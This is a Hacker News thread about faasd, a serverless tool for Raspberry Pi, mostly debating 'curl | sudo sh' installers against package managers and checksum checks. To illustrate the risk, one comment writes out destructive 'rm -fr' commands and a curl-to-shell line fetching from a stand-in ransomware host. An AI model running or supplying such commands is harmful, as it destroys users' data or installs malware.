Hacker Newsnew | past | comments | ask | show | jobs | submitlogin
Faasd – Lightweight Serverless for Raspberry Pi (alexellis.io)
75 points by alexellisuk on Oct 24, 2020 | hide | past | favorite | 47 comments


Ehm, what's the point in running serverless on a (single) server? How is that different from writing an API with something like express or flask?


Read the introduction and conclusion for usecases. Self-hosted FaaS gives a "serverless" hands-off experience, whilst making packaging and operating flask, Go, Node, Express, CSharp, etc, etc trivial. Try it, see what you think.


You don't have to keep it running in memory all the time.

If you have a small device with limited resources, maybe you'd rather have it be ready to potentially do many different things for you infrequently, as opposed to doing fewer things continuously all the time.


Isn't that the OS job?

It was my understanding that the kernel would put idle process to sleep, and even put the memory it uses from ram to disk and wake it up if there is some input to it.


How would the OS know that web server process is "idle" vs "ready to accept requests"?


Not sure, socket binding ?


I was taught in school "The job of an operating system is to share resources" so yes.


Ok, that's a fair point. So maybe some serverless tech can be more specialised and thus better than the Linux kernel at managing, effectively, virtual memory.

If everything is written in-house I still think any API would be simpler but I guess this way some functions can be supplied by vendors/open-source which currently cannot be composed into an e.g. flask API. So it would be nice to have a way of composing APIs from simple functions supplied in packages for this use. I guess that is what serverless is.


It's a bad idea to run Docker on a Raspberry Pi, mostly because it will eat the memory card, it will be faulty way sooner because lots of I/O.

I know from experience :)


In case you aren't aware, there are plenty of tutorials out there that help you get a raspberry pi to boot from USB, which allows you to use any HD there is.

Moreover, nothing stops you from getting everything to run on a RAM drive. There are raspberry pis with 8GB of RAM on the market right now.

Having said that, an official raspberry pi SD card with 16GB is sold for 10$. Not exactly something that pushes you to bankruptcy.


This isn't docker, it's containerd and once deployed this is mostly read-only. You can also mount a USB hard drive of NVMe over USB if you want.

Personally, I netboot my RPis, and faasd works equally well on the public cloud.


> it will be faulty way sooner because lots of I/O

It all makes sense now. One of my first computing projects was making a small cluster computer with raspberry PI boards. I noticed that the SD cards started to fail oddly fast. Most likely since they were all either swam nodes, or a swarm controller.


Just map /var/lib/docker to another storage location, then.


What is it about Docker that makes it so much worse?

Been running Home Assistant via Docker (Hassio) 24/7 for over two years now, off the same sd-card on my Raspberry Pi 3B, no issues so far.


The difference might be (besides card quality) the amount of free space on the card. If you are churning through the same 500MB with your temporary files you will wear the card off much faster compared to spreading the same IO over 5GB of empty space.


A lot of RPis are running on non-SD storage or durable SD Cards.


New raspberry pi 4s can boot from usb out of the box since a month or two ago.


I do agree with you.

However, I think pi sd cards get a bad rap because of marginal power supplies (very common before pi 4) and unclean shutdowns.

I had a card become corrupted and reformatting it did the trick since then.


I had a Pi which was very unstable. Measured the USB cable, supposedly a charging cable, and it had 1 Ohm resistance! Replaced it with a proper one and rock solid since.


why is it still acceptable to suggest something like

  curl -sLfS https://cli.openfaas.com | sudo sh

?


Can you explain why this is so unacceptable? Couldn't you inspect the contents at the url before you executed the command? What I've seen in some cases is, run the curl command to download the file and then execute it. I don't see much difference. This is a serious question, not arguing that this is the best way.


You answered the question yourself.

The difference is between inspecting the executed command, and blindly executing something where you have no idea what it's going to do.

For example, maybe the URL contents is "rm --no-preserve-root -fr /". Or "rm -fr /home/*/Pictures 2>/dev/null". Or "curl https://ransomeware-encryptor.example.com | sh".

No problem if you inspect it first. Lots of unhappiness and heartbreak if you don't.


Has anyone ever in the history of complaining about this type of script run one and had it nuke their computer? What are the odds that the domains and companies and projects that use this have built their online presence just to pwn your computer for the lulz or that they have been compromised by a malicious actor without being detected at the same time you run the installer, and no one anywhere said anything?

How about if instead we exercise critical thinking and make our own assessment of the risk and act accordingly? Why would you choose not to pipe a shell script from a site you don’t trust but execute their installer instead?

If you don’t want to pipe it, download it and read it first.


Hey, I use "curl | sh" myself.

But I don't pretend there's no security risk in doing so. Like you advised, I exercise critical thinking, and then I take a risk.

On someone else's production machine, or a container with sensitive data, that risk is too high. On a fun machine in isolation it's fine.

The GPP asks what's the security difference between inspecting and not inspecting the downloaded command.

> or that they have been compromised by a malicious actor without being detected at the same time you run the installer

Installers are compromised quite often by malicious actors. Running an installer is just as dubious as running "curl | sh".

However, replacing an installer with one that looks the same but is actually malicious, is a lot more work than replacing a blind script with one that looks the same but is actually malicious.

And the risk of a malicious blind script going unnoticed is higher than a compromised installer when the SHA256 is shown to be checked alongside the latter's link, simply because the attacker would need to change two places instead of one. Yes I do check hashes of installers when that's possible and there isn't a package manager already doing so. It's a good idea anyway in case of a corrupted download file, which I do see from time to time.


> had it nuke their computer?

Pretty close. Some of them install all sorts of wacky dependencies through non-traditional means. Like you curl an install script and then it goes and curls a whole bunch of other stuff.

Massive PITA to track all the changes that it made and uninstall it.

Package managers were made for a reason, and people should use them.


Since the shell script in question installs OpenFAAS, unless you read all the source code for OpenFAAS too, then really you still have no idea if it's going to do something malicious or not.


What would be cool is a command line util that you could pipe the script to for a safety inspection.

Something like: curl https://ransomeware-encryptor.example.com | script-checker | sh


    alias script-checker="echo 'echo unsafe'"


A reasonable attacker would provide different file to curl and to the browser so you inspect something else then you run and don't even have a copy of the file.


Updated with two other options. These are documented in the existing link, but made clearer because of this comment.


Because it is probably too much work to correctly package the thing for multiple operating systems.


It never was acceptable in polite society, but I find it's a useful signal to indicate what software to avoid.


Good question, I personally find gVisor-like [0] snippets that suggests to copy & paste in order to install the program as the most pleasant way:

   (
     set -e
     URL=https://storage.googleapis.com/gvisor/releases/release/latest
     wget ${URL}/runsc ${URL}/runsc.sha512
     sha512sum -c runsc.sha512
     rm -f runsc.sha512
     sudo mv runsc /usr/local/bin
     sudo chmod a+rx /usr/local/bin/runsc
   )
Thanks to the used parentheses it feels like a "one-liner" script. Is there any better way to share installation script?

[0]: https://gvisor.dev/docs/user_guide/install/


Yes, a .deb package. Much easier to UNinstall. That's the biggest problem with these install scripts, they give a crap across your entire system and it's not obvious how to get rid of it if you decide you don't want it.


Actually, deb is way how to "distribute" software not to "just" install something. Let's say I would like to install Docker I will need to type following commands in case of Ubuntu:

  (
      sudo apt-get update
      sudo apt-get -y install \
          apt-transport-https \
          ca-certificates \
          curl \
          gnupg-agent \
          software-properties-common
      curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
      sudo apt-key fingerprint 0EBFCD88
      sudo add-apt-repository -y \
          "deb [arch=amd64] https://download.docker.com/linux/ubuntu \
          $(lsb_release -cs) \
          stable"
      sudo apt-get update
      sudo apt-get install -y docker-ce docker-ce-cli containerd.io
  )
How would `.deb` help you to install/uninstall such software? Do mind mean embedding some scripts to add third-party repository and then install your app?

Even then, what it actually changes from the script I have already suggested in previous post? It is still about downloading two files (signature and packaged application) and install it (e.g. via dpkg --install).


Why not just:

    sudo apt install docker.io
And for more up-to-date versions, why doesn't Docker create a ppa? At most it should be something of the sort of:

    sudo apt-add-repository ppa:docker/docker
    sudo apt install docker
That's how these things were intended to work.


PPA's are just Ubuntu's way to make creating APT repositories easier. Those steps above are the longer way of achieving the same result without relying on Canonical's infrastructure. The same instructions can also be used with minor changes to also work on Debian and Raspbian (and could probably work on most other Debian-based distros).

Those steps above are covering all the bases for Debian-based distros, adding the signing keys Docker uses for their packages, and then finally inst


You can just download the .deb files from https://download.docker.com/linux/ubuntu/dists/focal/pool/st... and install them. No need to add another repo.


Erm, no. I think I haven't been clear in my first post. I am not asking about "how to install apt package", but how to provide a universal recipe to provide 3rd-party software as handy installation script. What you suggest is how to download and install few debs from a website. When I writing such script, I don't trust the host name "just like that" as you suggest. It can be malformed or point totally to different host that we would expect.


It installs a single static binary, hardly sprawling all over your system. It's also available in brew, AUR, and a bunch of other places.


Linux package management systems are old enough to purchase alcohol in the United States.


Of course they are but they are meant for more sophisticated purposes, (i.e. install, update, reinstall, remove app or even purge program with user data, etc.) and all of that logic is usually covered with signature checking with other security-oriented algorithms. I agree, I find apt/dnf/pacman/apk/xbps are great, but...

In case of Ubuntu, in order to install some deb-based software you usually have to bring your own script (this is what I call "copy & paste installation script") to add third-party repository that contains given package.


well, the definition of a linux distribution is a repository + a package manager.

https://en.wikipedia.org/wiki/Linux_distribution

:)


The most surprising thing is this article is that containerd maintainers don’t provide binaries for anything but x86_64!


Yes.. working on that one, they don't have e2e testing equipment and don't have a personal interest in it so default to not doing anything about it. In the meantime armhf and arm64 are available here, along with custom build instructions - https://github.com/alexellis/containerd-arm


This should be flagged as 2019 in the title. OpenFaaS has progressed further (IIRC there are Docker Compose files for single-node deployments out there).


For those who are commenting without reading the post ( I know who you are :) )

> The use-cases for Serverless / FaaS are fairly well-known, but you could use faasd at the edge, in a smart-car, as part of an IoT device, for crunching data before uploading samples to the cloud, for webhook receivers/alerting, bots, webservices, API integrations or even providing your own APIs. Compute is compute, and OpenFaaS with containerd makes it easy to both consume and provide.

See also potential use-cases

Bear in mind that faasd is also used in production where users don't want to maintain a Kubernetes cluster, but do want a few APIs, websites, or functions.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: